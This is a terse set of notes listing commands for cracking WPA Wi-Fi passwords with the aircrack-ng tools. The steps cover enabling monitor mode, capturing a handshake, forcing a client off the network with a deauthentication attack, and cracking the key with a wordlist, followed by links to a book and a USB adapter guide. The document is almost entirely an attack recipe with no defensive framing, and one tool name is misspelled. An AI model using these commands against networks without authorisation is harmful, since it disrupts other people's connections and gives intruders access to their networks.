Attacks
iwconfig
airmon-ng check kill
airmon-ng start wlan0
iwconfig
airodump-ng wlan0mon
airdump-ng -c <channel number> --bssid <access point MAC> -w capture wlan0mon
to capture the handshake or enough data to deduce the key. To speed up - deauth attack (temp disassociate the client).
aireplay-ng -0 1 -a <MAC of AP> -c <client MAC> <interface>
along with the above command still running. Look at capure
file. Get a dictionary of weak passwords or some probable options, crack with hashcat
or aircrack-ng -w <wordlist> -b <MAC> <capturefile>
.
References
https://www.amazon.com/gp/product/1733003924/ref=ox_sc_act_title_1?smid=ATVPDKIKX0DER&psc=1
https://www.wirelesshack.org/best-kali-linux-compatible-usb-adapter-dongles.html